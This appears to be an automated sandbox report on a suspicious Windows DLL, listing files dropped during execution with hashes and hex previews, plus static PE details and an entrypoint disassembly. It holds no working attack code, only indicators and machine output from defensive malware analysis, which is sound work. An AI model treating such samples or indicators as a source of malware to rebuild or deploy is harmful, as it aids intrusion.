.1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9FA.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 15 03:06:09 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	43868
Entropy (8bit):	2.138543442944401
Encrypted:	false
SSDEEP:	192:KVlYGGO9mYuWjHw/+P+eVuZfIytkQtm9Xuxhm1uuTk:uR9rFHw/+mecFIy2Qtmd3xT
MD5:	56467E8FD745BCFC06C0B5F88A62BF6F
SHA1:	899B58925C5F9C639DB207975911CF1465777642
SHA-256:	D7C69D8A79DC2400FF03A61F3A804D3E96F20E4EFB5D423C469BF99B31327390
SHA-512:	C287AF0EF8ECEF0C50787991100DF0B8DA397E3E2C3C297A8CF199CB477E718AE1424455B57EFE0289EC25D3945B6539878BE498B2F0964DA1CD859FECA34955
Malicious:	false
Preview:	MDMP....... .......!:.a....................................$...T............%..........`.......8...........T..........................x...........d....................................................................U...........B..............GenuineIntelW...........T............:.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC20A.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8348
Entropy (8bit):	3.70212377138827
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiLl6pvS6YF4SUlcgmfzSwGqCpBL89bJnsfzDm:RrlsNiZ6pvS6YaSUlcgmfzSwtJsfm
MD5:	B35C804BF51DBB7FFE497EEE056033D9
SHA1:	F59521EB0A418AE51CA77D122B59AB0DF827EF37
SHA-256:	47361D87D4418E879C8F761A43D94C66BDB83AB1284BDE982243E8628F620ABC
SHA-512:	23FFB49E2CCDAF03E935CB0B0BAB3206890F4BE6848E423BF994FBC81CEC8A1C054698DBB17C66DB8289CF26547255ABDC6382B6FBF821E1146A2D30821A7583
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC622.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.477238545321345
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI9djZWSC8BG8fm8M4J2+WZFmi+q84pvIKcQIcQw0ad:uITfl2oSNZJAP5IKkw0ad
MD5:	F85F06BAC1F9052071AB11572B341DD1
SHA1:	87A2129CA1B02F0F0832859F5EAE31E51257DF7F
SHA-256:	1216B2DE52FD428865C835DACB39B0E521F858995A4330C84CA0AC69B55E6C09
SHA-512:	A41C51D8C11B12F1BDBE272F947692EF686949038BE8E9745BE5CF302B5DFA2B36DAABB92D9BE1317DAEFF18B088EBEDA030D2FAE9AAB1CEEC13B93A2D0C91CE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342816" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1183592402755416
Encrypted:	false
SSDEEP:	6:kKv0k8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:n09kPlE99SNxAhUeYlUSA/t
MD5:	101BCECEB3D5E9850C1FF2955B331302
SHA1:	94D03A05BBBE53EAE7EC4D7C18A341141BF9FF0C
SHA-256:	D8C0BD2F4FEB0AFE954259AB835AC1FF5E7883696BA77C16A9FA6DA3B66DAAA4
SHA-512:	21DB6B8B0084988A671BDBE0C42A7BC3509A228BEAD7B7D3E8B7D8273C42997416EB6743E22D94A45BB9BCA3F9BF3F16B3F767051774FF5485281B556ADF3FD5
Malicious:	false
Preview:	p...... ........(I.....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11023839033166519
Encrypted:	false
SSDEEP:	12:26oielaXm/Ey6q9995+OUq3qQ10nMCldimE8eawHjcL:26oielPl68gOBLyMCldzE9BHjcL
MD5:	28B2D9AD6EE54677C317A1D005F81248
SHA1:	F6B86083C9E0077ACF7F393F716E92CA41DC01D3
SHA-256:	D4A1B84C98AE190BFB1546EEF6D488039703768C942CDBBCD80A560238916D02
SHA-512:	A0A0E4643932F13D3DF8ACCBAE5277CCDDB64B8297355BDB0A6CD94FA1C05978D7FC2BE9E026D8A9A7CA431FBFB4B80169EB552C7B5CB4E9CEC799CC30100EA7
Malicious:	false
Preview:	....................................................................................X............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.V...... .....Xmi............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....X...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1128424389256934
Encrypted:	false
SSDEEP:	12:cnj/VXm/Ey6q9995+OaL1miM3qQ10nMCldimE8eawHza1miIatN:kj/4l68gOaL1tMLyMCldzE9BHza1tIan
MD5:	6CA6C206DD887547E5A7BD10F28DCC74
SHA1:	A90B74A155108C7FC60C929F67E754BB1C000B96
SHA-256:	6C46C67D7108FE77B2AFCB078E2E30F19260320FE7EF05F483769FEBAA7C7CAA
SHA-512:	B910B62B835BA4A783084B4764EFE1E3ACDF153ADB5EBD239C45EA431DAB9699711E77022B150E5482A508B6D5F12C9DE8A3D53525E0B1195BC141B43C096F22
Malicious:	false
Preview:	....................................................................................X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.V...... ......Fb............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....X..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11264702181093222
Encrypted:	false
SSDEEP:	12:cnrXm/Ey6q9995+OY1mK2P3qQ10nMCldimE8eawHza1mKhK:kil68gOY1iPLyMCldzE9BHza1Y
MD5:	D3627C9A2EA309C80D0DE8DA9CDCEFA4
SHA1:	EBD314F52624E3DFF8BDE03C20219BB5DBDCC583
SHA-256:	8CAC63BF778E778D3AFB9028A9A2B5641FB73AE91C70B623E72859FEBAD946A5
SHA-512:	BA37CE30642106991E1D0AC4BE50E01FB21D321445B7134C20ED50B80F64854CA7D15E87040A8494009301C4FB14107F2B172FF6B7A6E68C11903E9BC607978D
Malicious:	false
Preview:	....................................................................................X...bP.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.V...... .....z.[............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....X...$X......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001@. (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11023839033166519
Encrypted:	false
SSDEEP:	12:26oielaXm/Ey6q9995+OUq3qQ10nMCldimE8eawHjcL:26oielPl68gOBLyMCldzE9BHjcL
MD5:	28B2D9AD6EE54677C317A1D005F81248
SHA1:	F6B86083C9E0077ACF7F393F716E92CA41DC01D3
SHA-256:	D4A1B84C98AE190BFB1546EEF6D488039703768C942CDBBCD80A560238916D02
SHA-512:	A0A0E4643932F13D3DF8ACCBAE5277CCDDB64B8297355BDB0A6CD94FA1C05978D7FC2BE9E026D8A9A7CA431FBFB4B80169EB552C7B5CB4E9CEC799CC30100EA7
Malicious:	false
Preview:	....................................................................................X............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.V...... .....Xmi............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....X...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.1128424389256934
Encrypted:	false
SSDEEP:	12:cnj/VXm/Ey6q9995+OaL1miM3qQ10nMCldimE8eawHza1miIatN:kj/4l68gOaL1tMLyMCldzE9BHza1tIan
MD5:	6CA6C206DD887547E5A7BD10F28DCC74
SHA1:	A90B74A155108C7FC60C929F67E754BB1C000B96
SHA-256:	6C46C67D7108FE77B2AFCB078E2E30F19260320FE7EF05F483769FEBAA7C7CAA
SHA-512:	B910B62B835BA4A783084B4764EFE1E3ACDF153ADB5EBD239C45EA431DAB9699711E77022B150E5482A508B6D5F12C9DE8A3D53525E0B1195BC141B43C096F22
Malicious:	false
Preview:	....................................................................................X...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.V...... ......Fb............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....X..........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.N (copy) Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11264702181093222
Encrypted:	false
SSDEEP:	12:cnrXm/Ey6q9995+OY1mK2P3qQ10nMCldimE8eawHza1mKhK:kil68gOY1iPLyMCldzE9BHza1Y
MD5:	D3627C9A2EA309C80D0DE8DA9CDCEFA4
SHA1:	EBD314F52624E3DFF8BDE03C20219BB5DBDCC583
SHA-256:	8CAC63BF778E778D3AFB9028A9A2B5641FB73AE91C70B623E72859FEBAD946A5
SHA-512:	BA37CE30642106991E1D0AC4BE50E01FB21D321445B7134C20ED50B80F64854CA7D15E87040A8494009301C4FB14107F2B172FF6B7A6E68C11903E9BC607978D
Malicious:	false
Preview:	....................................................................................X...bP.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................#.V...... .....z.[............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....X...$X......................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	9062
Entropy (8bit):	3.162262126373426
Encrypted:	false
SSDEEP:	192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zXb+Sx:j+s+v+b+P+m+0+Q+q+gb+Sx
MD5:	32C8C0A87C56C68AF0C62759666804BE
SHA1:	AB2A681D654B67C30E33913D60C6B7B9414DCFE7
SHA-256:	5AFE9CE2F28BF00342A6490A504135BEF50323EA14C345894D14678D2510A45C
SHA-512:	401E2969C055104B770D9EF1F55AA4AA35C2CF7E5DF31A6CF1A05A92DCF93BD018848A158FB0FFCA924CDFAAF686FA3969B9100C8B46DF941B19A49BB7466EC9
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220115_030558_389.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.7738426074212
Encrypted:	false
SSDEEP:	96:4CGC42o+7EP5uT96PpY7FCrSI2lopvkEM42OT2EwlFz1cbMCJyX4JR2WSWZK5W2l:L/r8Hl2m8NCIahwCaCKCfCVCo
MD5:	05E13967C32752BFBBB54274AB317CD6
SHA1:	78D4EB6274C8C7E6028285C562CAB93B7067D893
SHA-256:	DDDEE0A3EA061D612B79712A84ED62A05D008169E85EC8085ABBA8425C2C040E
SHA-512:	FD801E53D90065F4CE965750F44CE3EC4C2EB0FFA8ACFA0C0EAEAA47526D821A2AABC1C6CB4444B6837D7444A2E7C603204AF45F782B5138C8BB440C3489F094
Malicious:	false
Preview:	.... ... ....................................... ...!...........................l...(...j........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......{.............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.1.5._.0.3.0.5.5.8._.3.8.9...e.t.l.........P.P.l...(...j.......................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.269520743307272
Encrypted:	false
SSDEEP:	12288:6kvFy0OO3fq3KxC43e84+iqq7k1gwpr+Fi/KvdOv696XeqavXKkMk:dvFy0OO3fq3KxCW9
MD5:	0DF88476CCE68E4067ADED702897C784
SHA1:	9A28B38C9262F4BE6702E9FA902730415B97B028
SHA-256:	6FFF8B214A0898BC837183DA889D428F095DFA5A9395E55D964741649AC69E2E
SHA-512:	7F45AAC7BC6C8BDE8858CF399E1FFBF19204D19AFD5D45131EE4BCC984151125CA8EE91B214706FCEBA0890F6F8E58C0EAD371ABB9511D7186503A0D743903D1
Malicious:	false
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..-................................................................................................................................................................................................................................................................................................................................................*.&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.391637600658709
Encrypted:	false
SSDEEP:	192:L2bPW16ECdjMPY65FSEsWftx152xgoJ4Xa2aJNSdkyFn6yvRrsfPWfYjdsiDoXzM:6Lk5Rftx1gPJ4XH7FFn7MZd1DoXzCv
MD5:	E94CC21BF7538517A00003547F9F632F
SHA1:	C22C72820ADEA00B343F1656D0C03C93E169C838
SHA-256:	84352C22DA2D4952E04400C4CBAE54366F77EB48C3324AB6D07077056C01ADB5
SHA-512:	B75C545BE1AF0351D9E9888241E531D3C888DB5CDDD62067684B872A77B63612446DF3397A1C4CD948B0BCC234C613D5A94722A869CC79E64FE87583B64F7A1E
Malicious:	false
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..-................................................................................................................................................................................................................................................................................................................................................,.&.HvLE.>......Y...........d...u...+e-2...........0..............hbin................p.\..,..........nk,.h.1.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .h.1........ ........................... .......Z.......................Root........lf......Root....nk .h.1.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.767601853206896
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32% Windows Screen Saver (13104/52) 1.29% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	nV5Wu77N8J.dll
File size:	588288
MD5:	a0306b7a6a12022e4fc8e586b0bc90ec
SHA1:	ee7d221826a725a2110bbddbea34bd14522b5ab4
SHA256:	9b1ca060b5a969f03c4c8d99ad487a454742e47fff97343a90afacb5da7d9589
SHA512:	9bf807e5b79ec4d6c24db9106db43d6e4e2211d70caf8ca71101d96001a7fb6c31dad9ac4d72b8e6646e03a7bfa70b296968be6a24f3d11dd8e90090de94d7dc
SSDEEP:	6144:cNU5LwA22222GgngDrDRVyYli/ci2tEGW78ODQiE3tvOSk5DKXOW14IkFxVFgY4E:x5w7YM/cYVV7EsOpOJyvnHtytFyQ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m.......................................^F......^P.n....^W.t....^Y......^A......^G......^B.....Rich....................PE..L..

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x1002eaac
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x61E03DE6 [Thu Jan 13 14:57:42 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7f57698bb210fa88a6b01b1feaf20957

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F63F0994437h
call 00007F63F099CCA8h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007F63F0994321h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+10h]
mov eax, edi
sub eax, 00000000h
je 00007F63F0995A1Bh
dec eax
je 00007F63F0995A03h
dec eax
je 00007F63F09959CEh
dec eax
je 00007F63F099597Fh
dec eax
je 00007F63F09958EFh
mov ecx, dword ptr [ebp+0Ch]
mov eax, dword ptr [ebp+08h]
push ebx
push 00000020h
pop edx
jmp 00007F63F09948A7h
mov esi, dword ptr [eax]
cmp esi, dword ptr [ecx]
je 00007F63F09944AEh
movzx esi, byte ptr [eax]
movzx ebx, byte ptr [ecx]
sub esi, ebx
je 00007F63F0994447h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F63F099489Fh
movzx esi, byte ptr [eax+01h]
movzx ebx, byte ptr [ecx+01h]
sub esi, ebx
je 00007F63F0994447h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F63F099487Eh
movzx esi, byte ptr [eax+02h]
movzx ebx, byte ptr [ecx+02h]
sub esi, ebx
je 00007F63F0994447h
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, dword ptr [ebx+ebx-01h]
mov esi, ebx
test esi, esi
jne 00007F63F099485Dh

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ C ] VS2005 build 50727
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
